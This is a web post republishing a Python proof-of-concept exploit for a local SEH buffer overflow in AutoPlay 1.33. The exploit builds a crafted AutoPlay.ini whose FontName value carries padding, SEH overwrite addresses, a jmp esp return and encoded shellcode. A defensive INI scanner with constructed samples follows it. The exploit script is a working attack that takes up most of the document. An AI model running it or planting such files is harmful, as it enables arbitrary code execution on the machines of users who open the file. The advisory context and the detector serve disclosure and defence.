
AutoPlay 1.33 Buffer Overflow

Posted on 16 February 2011

```python
#!/usr/bin/python
#
#
# AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH)
#
#
# Vendor: Naughter Software
# Product web page: http://www.naughter.com
# Affected version: 1.33
#
# Summary: AutoPlay is a shareware application used for making
# autorun.ini files that can be edited and stored to compact disks.
#
# Desc: The program suffers from a buffer overflow vulnerability
# when opening an autorun file (.ini), as a result of adding extra
# bytes to parts of the edited file, giving attackers the
# possibility of arbitrary code execution on the affected
# system. The buffer overflow also allows the attacker to bypass
# the Structured Exception Handling (SEH) protection mechanism.
#
# Tested on: Microsoft Windows 7 Ultimate
#
# Vulnerability discovered by: badc0re (Dame Jovanoski)
#
#
# Advisory ID: ZSL-2011-4994
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4994.php
#
#
# 13.02.2011
#

# Payload, kept as a bytes literal so it is written unchanged under Python 2 or 3.
shell = (b"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61"
         b"\x28\x38\x56\x83\xeb\xfc\xe2\xf4\x9d\xc0\x7c\x56\x61\x28\xb3\x13"
         b"\x5d\xa3\x44\x53\x19\x29\xd7\xdd\x2e\x30\xb3\x09\x41\x29\xd3\x1f"
         b"\xea\x1c\xb3\x57\x8f\x19\xf8\xcf\xcd\xac\xf8\x22\x66\xe9\xf2\x5b"
         b"\x60\xea\xd3\xa2\x5a\x7c\x1c\x52\x14\xcd\xb3\x09\x45\x29\xd3\x30"
         b"\xea\x24\x73\xdd\x3e\x34\x39\xbd\xea\x34\xb3\x57\x8a\xa1\x64\x72"
         b"\x65\xeb\x09\x96\x05\xa3\x78\x66\xe4\xe8\x40\x5a\xea\x68\x34\xdd"
         b"\x11\x34\x95\xdd\x09\x20\xd3\x5f\xea\xa8\x88\x56\x61\x28\xb3\x3e"
         b"\x5d\x77\x09\xa0\x01\x7e\xb1\xae\xe2\xe8\x43\x06\x09\xd8\xb2\x52"
         b"\x3e\x40\xa0\xa8\xeb\x26\x6f\xa9\x86\x4b\x59\x3a\x02\x28\x38\x56")

# Ordinary-looking .ini content. Decodes to "[General]\r\nTitle=A sample of what
# AutoPlay can do!\r\nIcon=.\autoplay.ico\r\n..." followed by a "[Button1]" section,
# and ends with "FontName=", the value that is overflowed below.
head = (b"\x5b\x47\x65\x6e\x65\x72\x61\x6c\x5d\x0d\x0a\x54\x69\x74\x6c\x65"
        b"\x3d\x41\x20\x73\x61\x6d\x70\x6c\x65\x20\x6f\x66\x20\x77\x68\x61"
        b"\x74\x20\x41\x75\x74\x6f\x50\x6c\x61\x79\x20\x63\x61\x6e\x20\x64"
        b"\x6f\x21\x0d\x0a\x49\x63\x6f\x6e\x3d\x2e\x5c\x61\x75\x74\x6f\x70"
        b"\x6c\x61\x79\x2e\x69\x63\x6f\x0d\x0a\x53\x74\x61\x72\x74\x75\x70"
        b"\x53\x6f\x75\x6e\x64\x3d\x2e\x5c\x64\x72\x75\x6d\x72\x6f\x6c\x6c"
        b"\x2e\x77\x61\x76\x0d\x0a\x45\x78\x69\x74\x53\x6f\x75\x6e\x64\x3d"
        b"\x2e\x5c\x65\x78\x70\x6c\x6f\x64\x65\x2e\x77\x61\x76\x0d\x0a\x4e"
        b"\x75\x6d\x62\x65\x72\x4f\x66\x42\x75\x74\x74\x6f\x6e\x73\x3d\x37"
        b"\x0d\x0a\x42\x61\x63\x6b\x67\x72\x6f\x75\x6e\x64\x42\x69\x74\x6d"
        b"\x61\x70\x3d\x2e\x5c\x73\x70\x6c\x61\x73\x68\x2e\x6a\x70\x67\x0d"
        b"\x0a\x4e\x75\x6d\x62\x65\x72\x4f\x66\x43\x6f\x6d\x62\x6f\x73\x3d"
        b"\x31\x0d\x0a\x0d\x0a\x5b\x42\x75\x74\x74\x6f\x6e\x31\x5d\x0d\x0a"
        b"\x43\x6f\x6d\x6d\x61\x6e\x64\x54\x79\x70\x65\x3d\x31\x0d\x0a\x43"
        b"\x6f\x6d\x6d\x61\x6e\x64\x3d\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e"
        b"\x65\x78\x65\x0d\x0a\x46\x6c\x79\x62\x79\x53\x6f\x75\x6e\x64\x3d"
        b"\x2e\x5c\x68\x6f\x76\x65\x72\x73\x65\x6c\x2e\x77\x61\x76\x0d\x0a"
        b"\x4c\x65\x66\x74\x3d\x38\x33\x0d\x0a\x54\x6f\x70\x3d\x31\x33\x0d"
        b"\x0a\x54\x65\x78\x74\x43\x6f\x6c\x6f\x72\x3d\x32\x35\x35\x2c\x30"
        b"\x2c\x30\x0d\x0a\x48\x69\x67\x68\x6c\x69\x67\x68\x74\x43\x6f\x6c"
        b"\x6f\x72\x3d\x32\x35\x35\x2c\x32\x35\x35\x2c\x30\x0d\x0a\x43\x61"
        b"\x70\x74\x69\x6f\x6e\x3d\x52\x75\x6e\x20\x57\x69\x6e\x64\x6f\x77"
        b"\x73\x20\x45\x78\x70\x6c\x6f\x72\x65\x72\x0d\x0a\x46\x6f\x6e\x74"
        b"\x53\x69\x7a\x65\x3d\x32\x34\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d"
        b"\x65\x3d")

junk = b"\x41" * 32
junk1 = b"\x41" * 92
nseh = b"\xeb\x06\x90\x90"   # short jmp +6 over the SEH record
seh = b"\x62\xce\x86\x7c"    # pop pop ret
esp = b"\x7b\x46\x86\x7c"    # jmp esp

# Open inside the try block so a failure to create the file is reported too.
try:
    f = open("AutoPlay.ini", "wb")
    f.write(head + junk + esp + junk1 + nseh + seh + shell)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")
```
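The advisory's core point is that a single oversized `FontName=` value in an otherwise normal .ini file is enough to corrupt the stack and the SEH chain. The following is an added, defender-side example that is not part of the advisory or its PoC: a small Python 3 checker that scans an AutoPlay-style .ini as raw bytes and flags any value that is implausibly long or carries non-printable bytes, which is the shape such a file takes regardless of the payload. The threshold `MAX_VALUE_LEN`, the function names and both sample files are constructed assumptions for illustration.

```python
import sys

# Assumed threshold: generous for real AutoPlay settings (file names, captions,
# RGB triples such as 255,255,0) yet well below what an overflowing value needs.
MAX_VALUE_LEN = 64


def scan_ini(data, max_len=MAX_VALUE_LEN):
    """Return (section, key, reason) findings for suspicious values in INI bytes.

    The file is handled as raw bytes because a crafted value is exactly the
    case where decoding it as text would fail or hide what is actually there.
    """
    findings = []
    section = None
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line.strip():
            continue
        if line.startswith(b"[") and line.endswith(b"]"):
            section = line[1:-1].decode("latin-1")
            continue
        key, sep, value = line.partition(b"=")
        if not sep:
            # A line without key=value shape should not occur in an AutoPlay file.
            findings.append((section, line[:16].decode("latin-1"), "line is not key=value"))
            continue
        key = key.strip().decode("latin-1")
        if len(value) > max_len:
            findings.append((section, key, "value length %d exceeds %d" % (len(value), max_len)))
        if any(b < 0x20 or b > 0x7e for b in value):
            findings.append((section, key, "non-printable bytes in value"))
    return findings


def is_suspicious(data, max_len=MAX_VALUE_LEN):
    """True when the file has at least one finding and should not be opened."""
    return bool(scan_ini(data, max_len))


# Constructed sample: a benign file shaped like the header the PoC decodes to.
BENIGN = (b"[General]\r\n"
          b"Title=A sample of what AutoPlay can do!\r\n"
          b"Icon=.\\autoplay.ico\r\n"
          b"NumberOfButtons=7\r\n"
          b"\r\n"
          b"[Button1]\r\n"
          b"CommandType=1\r\n"
          b"Command=explorer.exe\r\n"
          b"FontSize=24\r\n"
          b"FontName=Arial\r\n")

# Constructed sample: the same file with an oversized FontName value that also
# carries non-printable bytes, the general shape of an overflow attempt.
MALFORMED = BENIGN.replace(b"FontName=Arial",
                           b"FontName=" + b"A" * 200 + b"\xde\xad\xbe\xef")


if __name__ == "__main__":
    # Usage: python scan_autoplay_ini.py [path-to-ini]; defaults to the built-in sample.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else MALFORMED
    for section, key, reason in scan_ini(data):
        print("[%s] %s: %s" % (section, key, reason))
```

The check is deliberately format-level rather than signature-level: it does not look for the PoC's particular bytes, only for values no legitimate AutoPlay setting would ever have, so it also catches variants with a different payload or different return addresses.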
